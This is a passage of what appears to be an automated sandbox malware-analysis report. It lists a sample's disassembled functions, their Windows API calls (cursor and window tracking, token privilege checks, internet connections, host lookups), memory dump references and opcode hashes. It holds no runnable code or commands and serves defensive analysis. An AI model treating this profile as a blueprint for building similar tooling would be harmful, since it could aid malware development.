                                                      • Part of subcall function 0066387D: GetCurrentThreadId.KERNEL32 ref: 0066389E
                                                      • Part of subcall function 0066387D: AttachThreadInput.USER32(00000000,?,006652A7), ref: 006638A5
                                                    • GetCaretPos.USER32(?), ref: 0068519A
                                                    • ClientToScreen.USER32(00000000,?), ref: 006851D5
                                                    • GetForegroundWindow.USER32 ref: 006851DB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                    • String ID:
                                                    • API String ID: 2759813231-0
                                                    • Opcode ID: 7f49b38801f7a6681a643b72b42d2b84a4291440f3fe603f2ca107846b7cc01c
                                                    • Instruction ID: 98e00a14abe7b892bdb6230d14599b2d25f4061625b97d2af1b2536d6374f88b
                                                    • Opcode Fuzzy Hash: 7f49b38801f7a6681a643b72b42d2b84a4291440f3fe603f2ca107846b7cc01c
                                                    • Instruction Fuzzy Hash: BA311071A00118AFDB44EFA5C8459EFB7FAEF98304F10406AE515E7242DA759E05CBA4
                                                    Function 0068C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                    • GetCursorPos.USER32(?), ref: 0068C7C2
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0063BBFB,?,?,?,?,?), ref: 0068C7D7
                                                    • GetCursorPos.USER32(?), ref: 0068C824
                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0063BBFB,?,?,?), ref: 0068C85E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                    • String ID:
                                                    • API String ID: 2864067406-0
                                                    • Opcode ID: ad939ac43d6f6f59865cafe481cb46ce4b23a813b9deac3e45fc81780a586295
                                                    • Instruction ID: 91ebf646d6364a3260e374a51a6bd143dbe31da744bdd38854ca0297285eb579
                                                    • Opcode Fuzzy Hash: ad939ac43d6f6f59865cafe481cb46ce4b23a813b9deac3e45fc81780a586295
                                                    • Instruction Fuzzy Hash: 58317A75600018AFCB25DF58C898EEA7FBBEF49720F0446A9F9058B2A1C7319D51DBB4
                                                    Function 00620BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __setmode.LIBCMT ref: 00620BF2
                                                      • Part of subcall function 00605B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00667B20,?,?,00000000), ref: 00605B8C
                                                      • Part of subcall function 00605B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00667B20,?,?,00000000,?,?), ref: 00605BB0
                                                    • _fprintf.LIBCMT ref: 00620C29
                                                    • OutputDebugStringW.KERNEL32(?), ref: 00656331
                                                      • Part of subcall function 00624CDA: _flsall.LIBCMT ref: 00624CF3
                                                    • __setmode.LIBCMT ref: 00620C5E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                    • String ID:
                                                    • API String ID: 521402451-0
                                                    • Opcode ID: a8b40d820a19d1332bd033ec760265a03e9aa2c93a64aacac61b763b279ae8c1
                                                    • Instruction ID: 64cb3cdde18e2bf50167635fead23feb0a94ecf5cc9447d52b69edd875b30e6d
                                                    • Opcode Fuzzy Hash: a8b40d820a19d1332bd033ec760265a03e9aa2c93a64aacac61b763b279ae8c1
                                                    • Instruction Fuzzy Hash: 07112472A04A187EDB48B3B8BC429BE7B6B9F45320F14021EF104571D2DE715D868BA9
                                                    Function 00658B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00658652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00658669
                                                      • Part of subcall function 00658652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00658673
                                                      • Part of subcall function 00658652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00658682
                                                      • Part of subcall function 00658652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00658689
                                                      • Part of subcall function 00658652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0065869F
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00658BEB
                                                    • _memcmp.LIBCMT ref: 00658C0E
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00658C44
                                                    • HeapFree.KERNEL32(00000000), ref: 00658C4B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                    • String ID:
                                                    • API String ID: 1592001646-0
                                                    • Opcode ID: 1ba029af8acd3171f5c240e27e1e69f64b8898f624b59d8ec2e0e8f70fb12453
                                                    • Instruction ID: 58822603b5d343c1129e92d69541f882841c5814233f5b35da6b5d5013a3634a
                                                    • Opcode Fuzzy Hash: 1ba029af8acd3171f5c240e27e1e69f64b8898f624b59d8ec2e0e8f70fb12453
                                                    • Instruction Fuzzy Hash: CE219071E01208EFDB10DFA4C949BEEB7BAEF44356F144099E854B7240DB31AE0ACB60
                                                    Function 00671A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00671A97
                                                      • Part of subcall function 00671B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00671B40
                                                      • Part of subcall function 00671B21: InternetCloseHandle.WININET(00000000), ref: 00671BDD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Internet$CloseConnectHandleOpen
                                                    • String ID:
                                                    • API String ID: 1463438336-0
                                                    • Opcode ID: 20f7e5c3e121f1a115fe238232da3e8ce3f9f872d29ac5bba8d0391fea804544
                                                    • Instruction ID: 012dc4ec226f3b507179409f252190faa9f4d77db6236978e659f95e9a84cb83
                                                    • Opcode Fuzzy Hash: 20f7e5c3e121f1a115fe238232da3e8ce3f9f872d29ac5bba8d0391fea804544
                                                    • Instruction Fuzzy Hash: 8D21D131200601BFEB119F648C01FBAB7AFFF45B00F10811FFA099A650EB31D811ABA4
                                                    Function 0065E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0065F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0065E1C4,?,?,?,0065EFB7,00000000,000000EF,00000119,?,?), ref: 0065F5BC
                                                      • Part of subcall function 0065F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 0065F5E2
                                                      • Part of subcall function 0065F5AD: lstrcmpiW.KERNEL32(00000000,?,0065E1C4,?,?,?,0065EFB7,00000000,000000EF,00000119,?,?), ref: 0065F613
                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0065EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0065E1DD
                                                    • lstrcpyW.KERNEL32(00000000,?), ref: 0065E203
                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,0065EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0065E237
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: lstrcmpilstrcpylstrlen
                                                    • String ID: cdecl
                                                    • API String ID: 4031866154-3896280584
                                                    • Opcode ID: a1c769954c7c5c08d46f49855d0426640f81eeef49279cea27502df17aaa558f
                                                    • Instruction ID: a97feb3b71904ecb1551487fdb0145fd77b8348bb2f0739a7a85b2c9a7b2e128
                                                    • Opcode Fuzzy Hash: a1c769954c7c5c08d46f49855d0426640f81eeef49279cea27502df17aaa558f
                                                    • Instruction Fuzzy Hash: A811B136100345EFCF29AF64DC499BA77AAFF45311F40412AEC06CB258EB729A55CBA4
                                                    Function 00635332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 00635351
                                                      • Part of subcall function 0062594C: __FF_MSGBANNER.LIBCMT ref: 00625963
                                                      • Part of subcall function 0062594C: __NMSG_WRITE.LIBCMT ref: 0062596A
                                                      • Part of subcall function 0062594C: RtlAllocateHeap.NTDLL(01300000,00000000,00000001,00000000,?,?,?,00621013,?), ref: 0062598F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap_free
                                                    • String ID:
                                                    • API String ID: 614378929-0
                                                    • Opcode ID: 691b722fb4ce67796b67b01326241389eac5e5607736386913ee01066485cebc
                                                    • Instruction ID: c0961463a996db5ced2320d2050e3504f13240fbcd2ef2414f98e583293e2cde
                                                    • Opcode Fuzzy Hash: 691b722fb4ce67796b67b01326241389eac5e5607736386913ee01066485cebc
                                                    • Instruction Fuzzy Hash: 4911C132505E36AFEB312F70BC456A9379B9F103A0F10092EF9069B290EFB589418BD4
                                                    Function 00604531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00604560
                                                      • Part of subcall function 0060410D: _memset.LIBCMT ref: 0060418D
                                                      • Part of subcall function 0060410D: _wcscpy.LIBCMT ref: 006041E1
                                                      • Part of subcall function 0060410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006041F1
                                                    • KillTimer.USER32(?,00000001,?,?), ref: 006045B5
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006045C4
                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0063D6CE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                    • String ID:
                                                    • API String ID: 1378193009-0
                                                    • Opcode ID: d7a709848e3a73aa61c06c387bc36d2723a9517b69f91bc799cb6380e54e2c2d
                                                    • Instruction ID: 8e874c38e8030863236077c1434cd22cda5b601bf03512defe6bd7eacb0fe351
                                                    • Opcode Fuzzy Hash: d7a709848e3a73aa61c06c387bc36d2723a9517b69f91bc799cb6380e54e2c2d
                                                    • Instruction Fuzzy Hash: 2C21DAB0944794AFEB338B24EC55BE7BBEE9F02304F04009EE69D56281C7745A858B91
                                                    Function 006640B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 006640D1
                                                    • _memset.LIBCMT ref: 006640F2
                                                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00664144
                                                    • CloseHandle.KERNEL32(00000000), ref: 0066414D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CloseControlCreateDeviceFileHandle_memset
                                                    • String ID:
                                                    • API String ID: 1157408455-0
                                                    • Opcode ID: b833f0ca885af20b6041324a91e2d37adf569378d287f8a3c98f8d9591636dae
                                                    • Instruction ID: 15282745bcf461ba0c2669145c57e97c089e8aa07a2c093044a50e1ac803c2fa
                                                    • Opcode Fuzzy Hash: b833f0ca885af20b6041324a91e2d37adf569378d287f8a3c98f8d9591636dae
                                                    • Instruction Fuzzy Hash: D711A7759012387AD7309BA5AC4DFEBBB7DEF45760F1042AAF908D7280D6744E808BA4
                                                    Function 0067667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00605B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00667B20,?,?,00000000), ref: 00605B8C
                                                      • Part of subcall function 00605B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00667B20,?,?,00000000,?,?), ref: 00605BB0
                                                    • gethostbyname.WSOCK32(?,?,?), ref: 006766AC
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 006766B7
                                                    • _memmove.LIBCMT ref: 006766E4
                                                    • inet_ntoa.WSOCK32(?), ref: 006766EF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                    • String ID:
                                                    • API String ID: 1504782959-0
                                                    • Opcode ID: d37cfbb8dbb11baf590afb720013faabe373916b832304a5dc6c8de2dd4dca89
                                                    • Instruction ID: f56006d6e5e76e24ce234d39eace72b22d3b745efea7adddf23e8593a92d9bf5
                                                    • Opcode Fuzzy Hash: d37cfbb8dbb11baf590afb720013faabe373916b832304a5dc6c8de2dd4dca89
                                                    • Instruction Fuzzy Hash: A2118175540508AFCF44EBA4DD96DEF77BAAF04310B144169F506A71A2DF30AE04CB65
                                                    Function 00659023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00659043
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00659055
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0065906B
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00659086
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 8c46b2523b04225db20c5479b40b299e5b6f4ddd944c84921347660d180f21d7
                                                    • Instruction ID: e93ef8771cc2c5e2ada5e444d1c877fc39a044bab5204af42d20668bbe631048
                                                    • Opcode Fuzzy Hash: 8c46b2523b04225db20c5479b40b299e5b6f4ddd944c84921347660d180f21d7
                                                    • Instruction Fuzzy Hash: 35115E79900218FFDB10DFA5CC84EDDBB75FB48310F204195E904B7290D6716E50DBA4
                                                    Function 00601290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                    • DefDlgProcW.USER32(?,00000020,?), ref: 006012D8
                                                    • GetClientRect.USER32(?,?), ref: 0063B84B
                                                    • GetCursorPos.USER32(?), ref: 0063B855
                                                    • ScreenToClient.USER32(?,?), ref: 0063B860
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                    • String ID:
                                                    • API String ID: 4127811313-0
                                                    • Opcode ID: b6955d040492f819cb28eb9001fafe3ac194e789adfa5355bd0333716addc314
                                                    • Instruction ID: 3343270978328c88aee68ee5a159d4b515e9964704822e0be9ba9a2c456ab3a4
                                                    • Opcode Fuzzy Hash: b6955d040492f819cb28eb9001fafe3ac194e789adfa5355bd0333716addc314
                                                    • Instruction Fuzzy Hash: 2E112835940019FBCB04EFA4D8899FF77BAEB06300F000956F911EB290D730AA919BA9
                                                    Function 00661652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006601FD,?,00661250,?,00008000), ref: 0066166F
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,006601FD,?,00661250,?,00008000), ref: 00661694
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006601FD,?,00661250,?,00008000), ref: 0066169E
                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,006601FD,?,00661250,?,00008000), ref: 006616D1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CounterPerformanceQuerySleep
                                                    • String ID:
                                                    • API String ID: 2875609808-0
                                                    • Opcode ID: 1f7b94052e2e688e89894b083e9cde67f4e708a00afe2ec232d9684afb6db654
                                                    • Instruction ID: 41c45f8dd1f2f902ea653b76bf81fbff27478424c3f9c774c9c1f731b5cc6296
                                                    • Opcode Fuzzy Hash: 1f7b94052e2e688e89894b083e9cde67f4e708a00afe2ec232d9684afb6db654
                                                    • Instruction Fuzzy Hash: 8D115E35C0052DE7CF009FA5D948AEEBB7AFF0A751F194559E980FA240CB3055608BD6
                                                    Function 00637207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                    • String ID:
                                                    • API String ID: 3016257755-0
                                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                    • Instruction ID: 002e0ce9e47441148cd4ff9a682234797686909c419d9630b71e93dcad8f1323
                                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                    • Instruction Fuzzy Hash: 16014BB604818EBBCF625E84DC018EE3F67BF69351F588615FE1858131D236CAB1BB85
                                                    Function 0068B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 0068B59E
                                                    • ScreenToClient.USER32(?,?), ref: 0068B5B6
                                                    • ScreenToClient.USER32(?,?), ref: 0068B5DA
                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0068B5F5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ClientRectScreen$InvalidateWindow
